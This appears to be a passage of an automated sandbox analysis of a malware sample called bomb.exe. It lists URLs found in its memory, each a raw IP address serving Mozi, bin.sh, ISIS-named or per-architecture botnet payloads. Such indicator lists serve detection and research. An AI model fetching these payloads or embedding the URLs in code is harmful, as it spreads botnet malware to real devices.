Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://196.190.64.101:35263/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://196.190.64.101:35263/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://200.90.85.62:36869/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://200.90.85.62:36869/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://201.191.100.81:36838/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://218.93.45.14:47425/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://218.94.154.190:46477/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://218.95.127.115:60219/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://219.156.34.131:40370/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://219.157.177.47:46982/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://219.157.9.221:49966/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://221.14.110.42:43362/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://221.14.163.142:48818/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://221.14.163.142:48818/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://221.215.180.220:44848/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.136.54.33:56929/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.137.17.110:54555/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.138.19.160:33132/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.138.79.125:55449/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.138.79.125:55449/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.139.45.232:60606/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.139.69.181:37881/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.139.69.181:37881/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.139.78.17:42446/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.139.78.17:42446/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.141.139.94:58821/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.141.24.171:35003/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.141.46.154:33252/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.141.46.154:33252/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.142.72.194:45127/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://222.142.72.194:45127/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://223.8.238.89:46522/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://27.12.247.109:48001/Mozi.a
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://27.194.158.230:48297/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://27.202.100.34:33886/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://27.207.39.89:46898/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://27.207.39.89:46898/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://27.215.53.226:49351/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://39.65.214.251:59274/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.224.179.68:57229/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.224.238.146:60116/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.228.216.57:34995/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.230.57.152:36643/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.230.59.174:36874/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.233.167.198:37099/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.233.167.198:37099/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.234.209.209:54111/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.235.46.162:58790/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.235.95.130:33342/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.237.25.214:55033/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.239.168.96:47731/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.239.168.96:47731/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.239.225.89:48099/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.239.225.89:48099/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.239.242.254:35601/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.239.242.254:35601/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.5.82.213:60756/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.5.82.213:60756/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.54.19.69:47347/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.59.247.79:38613/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.59.247.79:38613/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.86.66.208:45928/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://42.86.66.208:45928/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.115.89.122:45856/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.230.66.45:10394/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.178.156.121:45314/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.178.21.153:58303/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.182.106.224:36135/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.182.118.92:56975/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.182.123.163:42825/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.182.148.25:34656/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.182.157.132:59710/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.182.230.94:49113/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.183.4.171:58584/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.183.45.138:53907/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.183.6.236:39864/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.184.240.248:59676/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.184.252.30:39594/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.184.54.39:51465/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.88.227.15:54237/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.88.227.15:54237/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.88.7.3:60753/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.89.11.47:47801/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.89.11.47:47801/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.89.203.155:50911/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.89.27.116:45812/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.91.85.200:55289/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.91.85.216:59783/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.91.85.216:59783/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.91.86.216:58581/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.91.86.216:58581/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.91.93.201:47744/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.92.65.160:50482/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.180.76:45028/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.183.230:58918/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.183.230:58918/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.184.123:43339/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.184.123:43339/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.184.162:57582/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.187.135:55216/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.191.162:57582/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.191.162:57582/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.20.72:53417/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.227.73:55045/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.93.29.186:44386/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.94.157.209:39567/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.0.214:44626/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.113.143:36076/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.113.143:36076/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.76.209:34819/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.76.209:34819/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.81.111:42346/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.84.218:38357/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.90.100:46492/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.90.169:51113/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.90.169:51113/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.95.94.255:37771/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.97.113.34:48209/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.97.114.164:58668/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.97.114.164:58668/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.97.115.247:48995/Mozi.a
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.97.116.225:38675/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.97.118.239:35063/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.97.125.223:38978/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.98.197.128:46756/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.99.131.64:49195/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.99.142.205:48152/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.99.211.239:55630/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.99.220.78:36638/Mozi.a
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.99.38.179:58189/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://59.99.38.179:58189/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://60.23.75.189:34291/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://60.23.75.189:34291/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.0.13.150:60477/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.0.146.42:48968/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.0.183.122:51756/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.101.214:47823/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.101.214:47823/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.101.214:47823/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.12.80:46697/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.130.133:42614/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.137.27:57063/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.151.106:41663/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.151.106:41663/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.180.60:38016/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.180.60:38016/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.19.114:39099/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.209.51:45136/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.22.18:58740/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.26.251:57047/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.28.212:60300/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.30.150:43048/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://61.3.30.150:43048/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.181.36.158/octopus.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.54.98.43:38155/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://69.117.23.50:40342/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://78.182.186.229:51607/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://88.234.116.7:51607/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://88.247.136.222:55706/bin.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://88.247.136.222:55706/i
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.42.100.80:38820/Mozi.m
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/ISIS.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/a-r.m-4.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/a-r.m-5.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/a-r.m-6.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/a-r.m-7.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/i-5.8-6.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/m-6.8-k.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/m-i.p-s.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/m-p.s-l.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/p-p.c-.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/s-h.4-.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/x-3.2-.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.92.253.151/x-8.6-.ISIS
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/arc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/arm4
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/arm5
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/arm6
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/go.sh
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/h
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/i586
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/i686
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/m68k
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/mips
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/mipsel
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/ppc
Source: bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://94.156.66.26/r
